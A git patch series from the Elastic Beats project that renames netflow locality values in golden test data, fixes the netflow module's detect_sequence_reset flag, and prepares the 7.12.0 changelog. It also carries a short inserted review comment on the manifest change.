@@ -1589,7 +1589,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -1676,7 +1676,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACZg==", @@ -1763,7 +1763,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -1850,7 +1850,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAFmQ==", @@ -1937,7 +1937,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -2024,7 +2024,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2111,7 +2111,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAFmQ==", @@ -2198,7 +2198,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2285,7 +2285,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2372,7 +2372,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2459,7 +2459,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json index 6a8448a65c1b..82a9efb87aac 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json 
+++ b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "port": 54594 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "6mUV1nPVG80", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.236.100", @@ -68,7 +68,7 @@ "source": { "bytes": 1855, "ip": "10.127.32.11", - "locality": "private", + "locality": "internal", "packets": 5, "port": 53 } @@ -82,7 +82,7 @@ "Fields": { "destination": { "ip": "10.36.237.22", - "locality": "private", + "locality": "internal", "port": 52058 }, "event": { @@ -98,7 +98,7 @@ }, "flow": { "id": "3BTOVt9gp8I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.237.22", @@ -143,7 +143,7 @@ "source": { "bytes": 217, "ip": "10.36.228.103", - "locality": "private", + "locality": "internal", "packets": 3, "port": 8000 } @@ -157,7 +157,7 @@ "Fields": { "destination": { "ip": "10.127.32.11", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -173,7 +173,7 @@ }, "flow": { "id": "6mUV1nPVG80", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.127.32.11", @@ -218,7 +218,7 @@ "source": { "bytes": 547, "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "packets": 7, "port": 54594 } @@ -232,7 +232,7 @@ "Fields": { "destination": { "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "port": 49180 }, "event": { @@ -248,7 +248,7 @@ }, "flow": { "id": "HVg4SttTufc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.36.236.100", @@ -293,7 +293,7 @@ "source": { "bytes": 7158, "ip": "52.206.251.4", - "locality": "public", + "locality": "external", "packets": 10, "port": 443 } 
@@ -307,7 +307,7 @@ "Fields": { "destination": { "ip": "52.206.251.4", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -323,7 +323,7 @@ }, "flow": { "id": "HVg4SttTufc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "52.206.251.4", @@ -368,7 +368,7 @@ "source": { "bytes": 1538, "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "packets": 11, "port": 49180 } @@ -382,7 +382,7 @@ "Fields": { "destination": { "ip": "10.36.228.103", - "locality": "private", + "locality": "internal", "port": 8000 }, "event": { @@ -398,7 +398,7 @@ }, "flow": { "id": "3BTOVt9gp8I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.228.103", @@ -443,7 +443,7 @@ "source": { "bytes": 217, "ip": "10.36.237.22", - "locality": "private", + "locality": "internal", "packets": 3, "port": 52058 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json index 91df765da979..ea23d1283ad0 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "159.65.125.168", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "NPZRWU1oZKQ", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -78,7 +78,7 @@ "source": { "bytes": 421, "ip": "10.100.5.2", - "locality": "private", + "locality": "internal", "packets": 6, "port": 43376 } @@ -92,7 +92,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { 
@@ -111,7 +111,7 @@ }, "flow": { "id": "wMmxEUF-2Sk", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -163,7 +163,7 @@ "source": { "bytes": 7621, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 131, "port": 54520 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "10.100.6.80", - "locality": "private", + "locality": "internal", "port": 62323 }, "event": { @@ -196,7 +196,7 @@ }, "flow": { "id": "2NG48p7EGpw", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -248,7 +248,7 @@ "source": { "bytes": 95, "ip": "10.100.4.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -262,7 +262,7 @@ "Fields": { "destination": { "ip": "13.32.251.8", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -281,7 +281,7 @@ }, "flow": { "id": "f0LYEiUntL0", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -333,7 +333,7 @@ "source": { "bytes": 3162, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 30, "port": 54497 } @@ -347,7 +347,7 @@ "Fields": { "destination": { "ip": "52.22.76.61", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -366,7 +366,7 @@ }, "flow": { "id": "9ATz0HlBbIQ", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -418,7 +418,7 @@ "source": { "bytes": 2711, "ip": "10.100.6.80", - "locality": "private", + "locality": "internal", "packets": 13, "port": 50030 } @@ -432,7 +432,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "vueGG5QVS_M", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, 
@@ -503,7 +503,7 @@ "source": { "bytes": 20855, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 346, "port": 54517 } @@ -517,7 +517,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -536,7 +536,7 @@ }, "flow": { "id": "rJySLUBW94Y", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -588,7 +588,7 @@ "source": { "bytes": 7495, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 129, "port": 54518 } @@ -602,7 +602,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -621,7 +621,7 @@ }, "flow": { "id": "pWQ3ZWUMRfU", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -673,7 +673,7 @@ "source": { "bytes": 7049, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 119, "port": 54519 } @@ -687,7 +687,7 @@ "Fields": { "destination": { "ip": "13.32.251.126", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -706,7 +706,7 @@ }, "flow": { "id": "M0l00u11bWc", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -758,7 +758,7 @@ "source": { "bytes": 1348, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 13, "port": 54521 } @@ -772,7 +772,7 @@ "Fields": { "destination": { "ip": "10.100.0.1", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -791,7 +791,7 @@ }, "flow": { "id": "lzKTutEyrKA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -843,7 +843,7 @@ "source": { "bytes": 82, "ip": "192.168.1.4", - "locality": "private", + "locality": "internal", "packets": 1, "port": 57253 } From d83c3c46105311672f4a73e4ef85e7f063f513c0 Mon Sep 17 00:00:00 2001 
From: Adrian Serrano Date: Mon, 22 Mar 2021 16:27:15 +0100 Subject: [PATCH 06/20] Fix detect_sequence_reset flag in netflow module (#24270) (#24459) This flag was not passed to the input unless set to true, which is the default. It was impossible to turn it off. Fixes #24268 (cherry picked from commit 22e20a134abb38e48687b7323d01ebaab2b0b51c) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/module/netflow/log/config/netflow.yml | 2 -- x-pack/filebeat/module/netflow/log/manifest.yml | 1 + 3 files changed, 2 insertions(+), 2 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 1b2ea44d6ed6..49e2461e4069 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -254,6 +254,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] - Fix Cisco ASA parser for message 722051. {pull}24410[24410] - Fix `google_workspace` pagination. {pull}24668[24668] +- Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] *Heartbeat* diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index dd111c35097c..460b45ee5c93 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml @@ -27,9 +27,7 @@ custom_definitions: {{end}} {{end}} -{{ if .detect_sequence_reset}} detect_sequence_reset: {{.detect_sequence_reset}} -{{end}} tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} diff --git a/x-pack/filebeat/module/netflow/log/manifest.yml b/x-pack/filebeat/module/netflow/log/manifest.yml index 250c2b414e93..a2a591a5258a 100644 --- a/x-pack/filebeat/module/netflow/log/manifest.yml +++ b/x-pack/filebeat/module/netflow/log/manifest.yml 
@@ -15,6 +15,7 @@ var: - name: timeout - name: custom_definitions - name: detect_sequence_reset + default: true - name: tags default: [forwarded] - name: internal_networks From 60dddefc58abaa50a90c10b1c02277c08dd54873 Mon Sep 17 00:00:00 2001 From: Elastic Machine Date: Mon, 22 Mar 2021 13:06:09 -0400 Subject: [PATCH 07/20] docs: Prepare Changelog for 7.12.0 (#24656) * docs: Close changelog for 7.12.0 * 23334 is not a breaking change * Fix link * Fix dangling line * More fixes * No need to add empty lines * Some cleanup * Final cleanup * Additional fix * Apply suggestions from code review Co-authored-by: Brandon Morelli Co-authored-by: Andres Rodriguez Co-authored-by: Andres Rodriguez Co-authored-by: Brandon Morelli --- CHANGELOG.asciidoc | 160 ++++++++++++++++++++++++ CHANGELOG.next.asciidoc | 225 ---------------------------------- libbeat/docs/release.asciidoc | 1 + 3 files changed, 161 insertions(+), 225 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 51c0f1f8aea3..68d0f9291afd 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc 
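Review bot: The `default: true` added under `- name: detect_sequence_reset` is now load-bearing and nothing in manifest.yml says so: the sibling change to config/netflow.yml in this patch renders `detect_sequence_reset: {{.detect_sequence_reset}}` unconditionally, so a future maintainer who drops or changes this default would presumably render an empty or `<no value>` entry into the input config, and whether the input tolerates that is not visible here. I would document the coupling on the var, e.g. `# Always rendered by config/netflow.yml; keep equal to the netflow input's own default (true).`. The commit message states that true is also the input's built-in default, but the two defaults live in different files and can drift silently, so a module config test that renders the template with `detect_sequence_reset: false` and asserts the resulting input config carries `false` would pin the behaviour #24268 reports. The `var:` list continues outside the hunk on both sides.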
@@ -3,6 +3,166 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.12.0]] +=== Beats version 7.12.0 +https://github.com/elastic/beats/compare/v7.11.2...v7.12.0[View commits] + +==== Breaking changes + +*Filebeat* + +- Rename `s3` input to `aws-s3` input. {pull}23469[23469] + +*Heartbeat* + +- Refactor synthetics configuration to new syntax. {pull}23467[23467] + +==== Bugfixes + +*Affecting all Beats* + +- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] +- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix panic with inline SSL when the certificate or key was smaller than 256 bytes. {issue}23820[23820] {pull}23858[23858] + +*Auditbeat* + +- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] +- system/login: Add additional offset check for utmp files. {pull}24515[24515] + +*Filebeat* + +- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] +- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] +- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] +- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] +- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] +- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] +- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] +- Update `filestream` reader offset when a line is skipped. 
{pull}23417[23417] +- Add check for empty values in azure module. {pull}24156[24156] +- Change the `event.created` in Netflow events to be the time the event was created by Filebeat +- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] +- Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] +- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] +- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] + +*Metricbeat* + +- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] +- Unskip s3_request integration test. {pull}23887[23887] +- Add system.hostfs configuration option for system module. {pull}23831[23831] + +==== Added + +*Affecting all Beats* + +- Honor kube event resysncs to handle missed watch events {pull}22668[22668] +- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] +- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] +- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] +- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] +- Add kubernetes.volume.fs.used.pct field. 
{pull}23564[23564] +- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] +- Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] +- Add `selector` information in Kubernetes services' metadata. {pull}23730[23730] + +*Auditbeat* + +- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] + +*Filebeat* + +- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] +- Added support for first_event context in Filebeat httpjson input {pull}23437[23437] +- Adding Threat Intel module {pull}21795[21795] +- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] +- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by removing unsupported processors. {pull}23763[23763] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] +- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] +- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] +- Populate `source.mac` and `destination.mac` for Suricata EVE events. 
{issue}23706[23706] {pull}23721[23721] +- Added string splitting for httpjson input {pull}24022[24022] +- Added Signatures fileset to Zeek module {pull}23772[23772] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ECS 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ECS 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ECS 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] +- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] + +*Heartbeat* + +- Bundle synthetics dependencies with Heartbeat docker image. 
{pull}23274[23274] + +*Heartbeat* + +- Update Journalbeat to ECS 1.8. {pull}23737[23737] + +*Metricbeat* + +- Enrich events of `state_service` metricset with Kubernetes services' metadata. {pull}23730[23730] +- Add support for Darwin/arm M1. {pull}24019[24019] +- Check fields are documented in AWS metricsets. {pull}23887[23887] +- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}23905[23905] + +*Packetbeat* + +- Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] + +*Functionbeat* + +- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] +- Add support for multiple regions {pull}21065[21065] + +*Heartbeat* + +- Add support for script processor. {pull}23229[23229] + +*Winlogbeat* + +- Add Audit and Authentication Policy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] +- Remove deprecated eventlogging API that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] + +==== Deprecated + +*Affecting all Beats* + +- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as a hostname when Subject Alternative Name is not present from v8.0. Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new major version of Beats. + + [[release-notes-7.11.2]] === Beats version 7.11.2 https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 49e2461e4069..91fecb4957b4 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc 
@@ -18,13 +18,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Remove `AddDockerMetadata` and `AddKubernetesMetadata` processors from the `script` processor. They can still be used as normal processors in the configuration. {issue}16349[16349] {pull}16514[16514] - Introduce APM libbeat instrumentation, active when running the beat with ELASTIC_APM_ACTIVE=true. {pull}17938[17938] - Make error message about locked data path actionable. {pull}18667[18667] -- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] *Auditbeat* *Filebeat* -- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] @@ -51,8 +49,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] *Heartbeat* -- Adds negative body match. {pull}20728[20728] -- Refactor synthetics configuration to new syntax. {pull}23467[23467] *Journalbeat* 
@@ -65,13 +61,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - kubernetes.container.cpu.limit.cores and kubernetes.container.cpu.requests.cores are now floats. {issue}11975[11975] - Fix ECS compliance of user.id field in system/users metricset {pull}19019[19019] - Remove "invalid zero" metrics on Windows and Darwin, don't report linux-only memory and diskio metrics when running under agent. {pull}21457[21457] -- Change cloud.provider from googlecloud to gcp. {pull}21775[21775] -- API address and shard ID are required settings in the Cloud Foundry module. {pull}21759[21759] -- Rename googlecloud module to gcp module. {pull}22246[22246] -- Use ingress/egress instead of inbound/outbound for system/socket metricset. {pull}22992[22992] -- Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] -- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] -- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}[23905] *Packetbeat* 
@@ -128,24 +117,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add service resource in k8s cluster role. {pull}20546[20546] - [Metricbeat][Kubernetes] Change cluster_ip field from ip to keyword. {pull}20571[20571] - The `o365input` and `o365` module now recover from an authentication problem or other fatal errors, instead of terminating. {pull}21258[21258] -- Orderly close processors when processing pipelines are not needed anymore to release their resources. {pull}16349[16349] -- Fix memory leak and events duplication in docker autodiscover and add_docker_metadata. {pull}21851[21851] -- Fix parsing of expired licences. {issue}21112[21112] {pull}22180[22180] -- Fix duplicated pod events in kubernetes autodiscover for pods with init or ephemeral containers. {pull}22438[22438] -- Fix FileVersion contained in Windows exe files. {pull}22581[22581] -- Fix index template loading when the new index format is selected. {issue}22482[22482] {pull}22682[22682] -- Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] - Periodic metrics in logs will now report `libbeat.output.events.active` and `beat.memstats.rss` - as gauges (rather than counters). {pull}22877[22877] -- Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] -- Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] -- Fix typo in config docs {pull}23185[23185] -- Fix `nested` subfield handling in generated Elasticsearch templates. 
{issue}23178[23178] {pull}23183[23183] -- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] -- Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] -- Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] -- Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] -- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] *Auditbeat* 
@@ -156,20 +128,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - system/package: Fix an error that can occur while trying to persist package metadata. {issue}18536[18536] {pull}18887[18887] - system/socket: Fix dataset using 100% CPU and becoming unresponsive in some scenarios. {pull}19033[19033] {pull}19764[19764] - system/socket: Fixed tracking of long-running connections. {pull}19033[19033] -- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] -- system/login: Add additional offset check for utmp files. {pull}24515[24515] *Filebeat* -- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] -- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] -- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] -- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] -- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] -- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] -- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] -- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Add check for empty values in azure module. {pull}24156[24156] - cisco/asa fileset: Fix parsing of 302021 message code. {pull}14519[14519] - Fix filebeat azure dashboards, event category should be `Alert`. {pull}14668[14668] - Fixed dashboard for Cisco ASA Firewall. {issue}15420[15420] {pull}15553[15553] 
@@ -212,23 +173,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `cisco` asa and ftd parsing of messages 106102 and 106103. {pull}20469[20469] - Fix event.kind for system/syslog pipeline {issue}20365[20365] {pull}20390[20390] - Fix event.type for zeek/ssl and duplicate event.category for zeek/connection {pull}20696[20696] -- Fix long registry migration times. {pull}20717[20717] {issue}20705[20705] -- Fix event types and categories in auditd module to comply with ECS {pull}20652[20652] -- Update documentation in the azure module filebeat. {pull}20815[20815] -- Remove wrongly mapped `tls.client.server_name` from `fortinet/firewall` fileset. {pull}20983[20983] -- Fix an error updating file size being logged when EOF is reached. {pull}21048[21048] -- Fix error when processing AWS Cloudtrail Digest logs. {pull}21086[21086] {issue}20943[20943] -- Provide backwards compatibility for the `set` processor when Elasticsearch is less than 7.9.0. {pull}20908[20908] -- Handle multiple upstreams in ingress-controller. {pull}21215[21215] -- Provide backwards compatibility for the `append` processor when Elasticsearch is less than 7.10.0. {pull}21159[21159] -- Fix checkpoint module when logs contain time field. {pull}20567[20567] -- Add field limit check for AWS Cloudtrail flattened fields. {pull}21388[21388] {issue}21382[21382] -- Fix syslog RFC 5424 parsing in the CheckPoint module. {pull}21854[21854] - Add json body check for sqs message. {pull}21727[21727] -- Fix incorrect connection state mapping in zeek connection pipeline. {pull}22151[22151] {issue}22149[22149] -- Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] -- Fix handing missing eventtime and assignip field being set to N/A for fortinet module. {pull}22361[22361] -- Fix for `field [source] not present as part of path [source.ip]` error in azure pipelines. 
